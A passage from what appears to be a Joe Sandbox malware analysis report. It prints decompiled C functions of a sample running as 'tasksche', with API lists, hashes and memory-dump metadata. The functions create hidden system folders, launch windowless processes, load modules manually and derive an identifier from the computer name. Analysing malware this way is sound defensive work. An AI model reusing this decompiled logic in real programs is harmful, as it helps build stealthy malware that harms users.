                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                                                • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 1900561814-3657104962
                                                                                • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                                                • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401AF6 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
				void* _t15;
				WCHAR* _t17;

				CreateDirectoryW(_a4, 0);
				if(SetCurrentDirectoryW(_a4) == 0) {
					L2:
					return 0;
				}
				_t17 = _a8;
				CreateDirectoryW(_t17, 0);
				if(SetCurrentDirectoryW(_t17) != 0) {
					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
					if(_a12 != 0) {
						_push(_t17);
						swprintf(_a12, L"%s\\%s", _a4);
					}
					_t15 = 1;
					return _t15;
				}
				goto L2;
			}





                                                                                0x00401b07
                                                                                0x00401b16
                                                                                0x00401b27
                                                                                0x00000000
                                                                                0x00401b27
                                                                                0x00401b18
                                                                                0x00401b1e
                                                                                0x00401b25
                                                                                0x00401b36
                                                                                0x00401b40
                                                                                0x00401b42
                                                                                0x00401b4e
                                                                                0x00401b54
                                                                                0x00401b59
                                                                                0x00000000
                                                                                0x00401b59
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                                                • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                                                • String ID: %s\%s
                                                                                • API String ID: 1036847564-4073750446
                                                                                • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                                                • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401064 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63processsynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;
				memset( &(_v88.lpReserved), 0, _t32 << 2);
				_v20.hProcess = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;
				_v88.dwFlags = _t37;
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return _t37;
			}







                                                                                0x00401070
                                                                                0x00401074
                                                                                0x0040107d
                                                                                0x00401082
                                                                                0x00401085
                                                                                0x00401086
                                                                                0x00401087
                                                                                0x0040108d
                                                                                0x0040108e
                                                                                0x004010a1
                                                                                0x004010b0
                                                                                0x00000000
                                                                                0x004010f7
                                                                                0x004010b5
                                                                                0x004010c5
                                                                                0x004010cc
                                                                                0x004010cc
                                                                                0x004010d5
                                                                                0x004010dd
                                                                                0x004010dd
                                                                                0x004010d5
                                                                                0x004010ec
                                                                                0x004010f1
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                                                • CloseHandle.KERNEL32(?), ref: 004010EC
                                                                                • CloseHandle.KERNEL32(?), ref: 004010F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                                                • String ID: D
                                                                                • API String ID: 786732093-2746444292
                                                                                • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                                                • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}





























                                                                                0x004077bd
                                                                                0x004077bf
                                                                                0x004077c4
                                                                                0x004077cf
                                                                                0x004077d0
                                                                                0x004077dd
                                                                                0x004077e2
                                                                                0x004077e7
                                                                                0x004077ee
                                                                                0x004077f5
                                                                                0x004077fc
                                                                                0x00407802
                                                                                0x00407808
                                                                                0x0040780a
                                                                                0x00407810
                                                                                0x00407816
                                                                                0x0040781f
                                                                                0x00407824
                                                                                0x00407829
                                                                                0x0040782f
                                                                                0x00407836
                                                                                0x0040783c
                                                                                0x0040783d
                                                                                0x00407842
                                                                                0x00407847
                                                                                0x0040784c
                                                                                0x00407851
                                                                                0x00407856
                                                                                0x0040786f
                                                                                0x00407875
                                                                                0x0040787a
                                                                                0x0040787f
                                                                                0x0040788c
                                                                                0x0040788e
                                                                                0x00407894
                                                                                0x004078d0
                                                                                0x004078d0
                                                                                0x004078d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078d5
                                                                                0x004078d6
                                                                                0x004078d6
                                                                                0x00407896
                                                                                0x00407896
                                                                                0x00407896
                                                                                0x00407897
                                                                                0x0040789a
                                                                                0x0040789c
                                                                                0x004078a7
                                                                                0x004078a9
                                                                                0x004078a9
                                                                                0x004078aa
                                                                                0x004078aa
                                                                                0x004078a7
                                                                                0x004078ad
                                                                                0x004078ad
                                                                                0x004078b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078b7
                                                                                0x004078be
                                                                                0x004078c4
                                                                                0x004078c8
                                                                                0x004078dd
                                                                                0x004078ca
                                                                                0x004078ca
                                                                                0x004078ca
                                                                                0x004078e9
                                                                                0x004078ee
                                                                                0x004078f2
                                                                                0x004078f8
                                                                                0x004078fd
                                                                                0x004078ff
                                                                                0x00407902
                                                                                0x00407903
                                                                                0x00407904
                                                                                0x0040790b

                                                                                APIs
                                                                                • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                                                • __p__fmode.MSVCRT ref: 004077FC
                                                                                • __p__commode.MSVCRT ref: 0040780A
                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                                                • String ID:
                                                                                • API String ID: 3626615345-0
                                                                                • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                                                • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}














                                                                                0x00407831
                                                                                0x00407836
                                                                                0x0040783d
                                                                                0x00407842
                                                                                0x00407847
                                                                                0x0040784c
                                                                                0x00407851
                                                                                0x00407856
                                                                                0x0040786f
                                                                                0x00407875
                                                                                0x0040787a
                                                                                0x0040787f
                                                                                0x0040788c
                                                                                0x0040788e
                                                                                0x00407894
                                                                                0x004078d0
                                                                                0x004078d0
                                                                                0x004078d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078d5
                                                                                0x004078d6
                                                                                0x004078d6
                                                                                0x00407896
                                                                                0x00407896
                                                                                0x00407896
                                                                                0x00407897
                                                                                0x0040789a
                                                                                0x0040789c
                                                                                0x004078a7
                                                                                0x004078a9
                                                                                0x004078a9
                                                                                0x004078aa
                                                                                0x004078aa
                                                                                0x004078a7
                                                                                0x004078ad
                                                                                0x004078ad
                                                                                0x004078b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004078b7
                                                                                0x004078be
                                                                                0x004078c4
                                                                                0x004078c8
                                                                                0x004078dd
                                                                                0x004078ca
                                                                                0x004078ca
                                                                                0x004078ca
                                                                                0x004078e9
                                                                                0x004078ee
                                                                                0x004078f2
                                                                                0x004078f8
                                                                                0x004078fd
                                                                                0x004078ff
                                                                                0x00407902
                                                                                0x00407903
                                                                                0x00407904
                                                                                0x0040790b

                                                                                APIs
                                                                                • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                                                  • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                                                • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                                                • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                                                • String ID:
                                                                                • API String ID: 2141228402-0
                                                                                • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                                                • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 96%
                                                                                			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}




















                                                                                0x004027e6
                                                                                0x004027ee
                                                                                0x004027ee
                                                                                0x004027f1
                                                                                0x004027f6
                                                                                0x004027f7
                                                                                0x004027fa
                                                                                0x00402801
                                                                                0x0040280d
                                                                                0x0040281a
                                                                                0x0040291c
                                                                                0x00000000
                                                                                0x0040291f
                                                                                0x00402825
                                                                                0x00402825
                                                                                0x0040282a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402830
                                                                                0x00402836
                                                                                0x0040283a
                                                                                0x00402840
                                                                                0x004028fd
                                                                                0x004028fd
                                                                                0x00402903
                                                                                0x00000000
                                                                                0x00402903
                                                                                0x00402846
                                                                                0x00402851
                                                                                0x00402854
                                                                                0x0040285e
                                                                                0x004028f0
                                                                                0x004028f6
                                                                                0x004028fd
                                                                                0x00000000
                                                                                0x004028fd
                                                                                0x00402864
                                                                                0x0040286a
                                                                                0x0040286d
                                                                                0x00402870
                                                                                0x00402873
                                                                                0x00402877
                                                                                0x00402889
                                                                                0x0040288b
                                                                                0x00402879
                                                                                0x0040287e
                                                                                0x00402881
                                                                                0x00402881
                                                                                0x0040288e
                                                                                0x00402891
                                                                                0x00402895
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040289c
                                                                                0x004028ab
                                                                                0x004028ab
                                                                                0x004028b0
                                                                                0x0040289e
                                                                                0x0040289e
                                                                                0x0040289e
                                                                                0x004028a1
                                                                                0x004028a1
                                                                                0x004028b7
                                                                                0x004028ba
                                                                                0x004028bd
                                                                                0x004028c1
                                                                                0x004028cc
                                                                                0x00000000
                                                                                0x004028c3
                                                                                0x004028c3
                                                                                0x004028c7
                                                                                0x00000000
                                                                                0x004028c7
                                                                                0x004028c1
                                                                                0x004028d4
                                                                                0x00402909
                                                                                0x0040290f
                                                                                0x00402916
                                                                                0x00000000
                                                                                0x00402916
                                                                                0x004028d6
                                                                                0x004028e4
                                                                                0x00402822
                                                                                0x00000000
                                                                                0x00402822
                                                                                0x00000000
                                                                                0x004028ea
                                                                                0x00000000
                                                                                0x00402825
                                                                                0x00000000

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                                                • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                                                • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$realloc
                                                                                • String ID: ?!@
                                                                                • API String ID: 1241503663-708128716
                                                                                • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                                                • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}





















                                                                                0x0040122e
                                                                                0x00401239
                                                                                0x00401240
                                                                                0x00401249
                                                                                0x00401250
                                                                                0x00401252
                                                                                0x0040125f
                                                                                0x0040126b
                                                                                0x00401277
                                                                                0x0040127e
                                                                                0x00401280
                                                                                0x00401286
                                                                                0x00401289
                                                                                0x0040128c
                                                                                0x00401297
                                                                                0x0040129d
                                                                                0x00401286
                                                                                0x004012a1
                                                                                0x004012ae
                                                                                0x004012b2
                                                                                0x004012b4
                                                                                0x004012b5
                                                                                0x004012ba
                                                                                0x004012be
                                                                                0x004012c0
                                                                                0x004012c0
                                                                                0x004012c4
                                                                                0x004012c5
                                                                                0x004012ce
